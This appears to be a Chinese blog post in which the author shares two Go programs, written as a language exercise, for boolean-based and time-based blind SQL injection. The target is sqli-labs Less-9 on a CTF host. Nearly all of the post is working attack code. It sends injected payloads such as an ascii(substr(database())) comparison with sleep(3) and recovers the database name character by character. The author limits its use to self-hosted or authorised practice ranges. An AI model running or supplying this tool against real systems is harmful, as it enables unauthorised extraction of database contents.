golang版布尔&时间盲注脚本
22 5.25 订正：Sprintf 里的 i 和 j 如果用 %s 占位，要先用 strconv.Itoa 转成字符串；如果像下面这样用 %d 占位，int 可以直接传，不需要转换。
当作练习 Go 语言，突发一想用 golang 写了个布尔盲注的脚本（只用于 sqli-labs 这类自建或已授权的靶场）。
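package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"strings"
	"time"
)

// Boolean-based blind SQL injection helper, written as a Go exercise against a
// sqli-labs style target. Each probe asks whether the i-th character of
// database() has ASCII code j; a page containing trueMarker means "yes" and j
// is appended to the recovered name.

// trueMarker is the substring that only appears in the response when the
// injected condition is true. Adjust it to the target page.
const trueMarker = "in..."

// maxLen bounds the number of characters recovered; extraction also stops
// early at the first position where no candidate code matches.
const maxLen = 60

// client is shared so keep-alive connections are reused, and carries a
// timeout so a stalled target cannot hang the extraction loop forever.
var client = &http.Client{Timeout: 10 * time.Second}

// parseForm turns "k1=v1&k2=v2" into url.Values WITHOUT percent-decoding the
// values, so a payload containing '%', '+' or quotes reaches the encoder
// byte-for-byte. (url.ParseQuery would turn '+' into a space and reject a
// bare '%', both common in SQL payloads.)
func parseForm(payload string) url.Values {
	form := url.Values{}
	for _, pair := range strings.Split(payload, "&") {
		if pair == "" {
			continue
		}
		key, value, _ := strings.Cut(pair, "=")
		form.Add(key, value)
	}
	return form
}

// probe sends one payload to url1 via GET (query string) or POST
// (application/x-www-form-urlencoded) and returns the full response body.
// The payload is parsed as key=value pairs and re-encoded, so quotes, spaces
// and pipes in the SQL are escaped correctly on both transports. The original
// ran url.QueryEscape over the whole "?id=..." string, which also escaped the
// leading '?' and the '=', producing a request the server could not parse.
func probe(url1, method, payload string) ([]byte, error) {
	form := parseForm(payload)
	var resp *http.Response
	var err error
	switch method {
	case "get":
		resp, err = client.Get(url1 + "?" + form.Encode())
	case "post":
		resp, err = client.PostForm(url1, form)
	default:
		return nil, fmt.Errorf("unsupported method %q: want \"get\" or \"post\"", method)
	}
	if err != nil {
		return nil, err
	}
	// Always close the body: the original leaked one connection per probe and
	// would dereference a nil response after any transport error.
	defer resp.Body.Close()
	return io.ReadAll(resp.Body)
}

// sqlinject recovers database() from the target at url1 one character at a
// time, printing the partial result after each hit. method is "get" or
// "post". The recovered string is returned; extraction stops after maxLen
// characters, at the first position where no code in 32..128 matches (end of
// the name), or after the first request error.
func sqlinject(url1 string, method string) string {
	var res strings.Builder
	for i := 1; i <= maxLen; i++ {
		matched := false
		for j := 32; j <= 128; j++ {
			payload := fmt.Sprintf("id=0' || (ascii(substr(database(),%d,1))=%d) -- q", i, j)
			body, err := probe(url1, method, payload)
			if err != nil {
				fmt.Println("request failed:", err)
				return res.String()
			}
			if strings.Contains(string(body), trueMarker) {
				res.WriteRune(rune(j))
				fmt.Println(res.String())
				matched = true
				break // exactly one code can equal this character
			}
		}
		if !matched {
			break
		}
	}
	return res.String()
}

func main() {
	url1 := ""   // target address
	method := "" // "get" or "post"
	sqlinject(url1, method)
}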
之后另择良辰吉日把时间盲注的也写出来😪
良辰吉日来了,补全了
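package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"strings"
	"time"
)

// Blind SQL injection helpers (boolean-based and time-based), written as a Go
// exercise against a sqli-labs style target. payload is a form string such as
// "id=0' || if(ascii(substr(database(),%d,1))=%d,sleep(3),1) -- q" whose two
// %d verbs receive the character position and the candidate ASCII code, in
// that order.

// Tunables. They are package-level so a caller (or a test) can adjust them
// without changing the function signatures.
var (
	// TrueMarker is the substring only present in the page when the injected
	// boolean condition holds; set it to whatever the target shows.
	TrueMarker = "in.."
	// RequestDelay is slept between probes to stay under the target's rate
	// limit (the original comment: 防止429).
	RequestDelay = 50 * time.Millisecond
	// TimeThreshold is the response time that counts as a hit in Timesql. It
	// must sit above the target's normal latency and below the client
	// timeout, and the payload's sleep() must exceed it with some margin.
	TimeThreshold = 3 * time.Second
	// MaxLen bounds how many characters are recovered.
	MaxLen = 60
)

// client is shared so connections are reused. Its timeout bounds a stalled
// probe and must stay larger than TimeThreshold, otherwise every slow (true)
// probe in Timesql would surface as an error instead of a hit.
var client = &http.Client{Timeout: 15 * time.Second}

// parseForm splits "k1=v1&k2=v2" into url.Values without percent-decoding,
// so '%', '+' and quotes in the SQL reach the encoder literally. The original
// used url.ParseQuery for POST (which turns '+' into a space and rejects a
// bare '%') and a QueryEscape/Replace dance for GET that also encoded any '&'
// between parameters, breaking the documented key1=value1&key2=value2 form.
func parseForm(payload string) url.Values {
	form := url.Values{}
	for _, pair := range strings.Split(payload, "&") {
		if pair == "" {
			continue
		}
		key, value, _ := strings.Cut(pair, "=")
		form.Add(key, value)
	}
	return form
}

// send issues one probe and returns the response; the caller must close
// resp.Body. method is "get" (payload in the query string) or "post"
// (application/x-www-form-urlencoded body).
func send(url1, method, payload string) (*http.Response, error) {
	form := parseForm(payload)
	switch method {
	case "get":
		return client.Get(url1 + "?" + form.Encode())
	case "post":
		return client.PostForm(url1, form)
	default:
		return nil, fmt.Errorf("unsupported method %q: want \"get\" or \"post\"", method)
	}
}

// Boolsql recovers a string one character at a time through a boolean
// oracle: the page contains TrueMarker iff the injected comparison is true.
// It prints the partial result after every hit and returns the full result.
// Extraction stops after MaxLen characters, at the first position with no
// match in 32..128 (end of string), or on the first request error — the
// original dereferenced a nil response on any transport failure.
func Boolsql(url1 string, method string, payload string) string {
	var res strings.Builder
	for i := 1; i <= MaxLen; i++ {
		matched := false
		for j := 32; j <= 128; j++ {
			resp, err := send(url1, method, fmt.Sprintf(payload, i, j))
			if err != nil {
				fmt.Println("request failed:", err)
				return res.String()
			}
			body, err := io.ReadAll(resp.Body)
			resp.Body.Close() // the original leaked the body on the GET path
			if err != nil {
				fmt.Println("reading response:", err)
				return res.String()
			}
			time.Sleep(RequestDelay)
			if strings.Contains(string(body), TrueMarker) {
				res.WriteRune(rune(j))
				fmt.Println(res.String())
				matched = true
				break
			}
		}
		if !matched {
			break
		}
	}
	return res.String()
}

// Timesql recovers a string through a timing oracle: the payload makes the
// database sleep when the comparison is true, so a response slower than
// TimeThreshold counts as a hit. Only the request itself is timed; the
// rate-limit delay is slept after the measurement, whereas the original
// clocked the delay as well. A network stall or a slow 429 is
// indistinguishable from a hit, so confirm results with a second pass.
func Timesql(url1 string, method string, payload string) string {
	var res strings.Builder
	for i := 1; i <= MaxLen; i++ {
		matched := false
		for j := 32; j <= 128; j++ {
			start := time.Now()
			resp, err := send(url1, method, fmt.Sprintf(payload, i, j))
			if err != nil {
				fmt.Println("request failed:", err)
				return res.String()
			}
			// Headers arrive only after the server-side sleep, so the time
			// to this point is the signal; the body is not needed.
			used := time.Since(start)
			// Drain and close so the connection can be reused by the next probe.
			io.Copy(io.Discard, resp.Body)
			resp.Body.Close()
			time.Sleep(RequestDelay)
			if used >= TimeThreshold {
				res.WriteRune(rune(j))
				fmt.Println(res.String())
				matched = true
				break
			}
		}
		if !matched {
			break
		}
	}
	return res.String()
}

func main() {
	url1 := "http://25777b85-05b5-4f4e-83c9-b2d1ab3f267a.node4.buuoj.cn:81/Less-9/" // target address (sqli-labs Less-9 on a CTF box)
	method := "get"                                                                 // "get" or "post"
	// Form-style payload, key1=value1&key2=value2; the %d placeholders receive
	// the character position and the candidate ASCII code.
	payload := "id=0' || if(ascii(substr(database(),%d,1))=%d,sleep(3),1) -- q"
	Timesql(url1, method, payload)
}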
编程能力有点垃🙄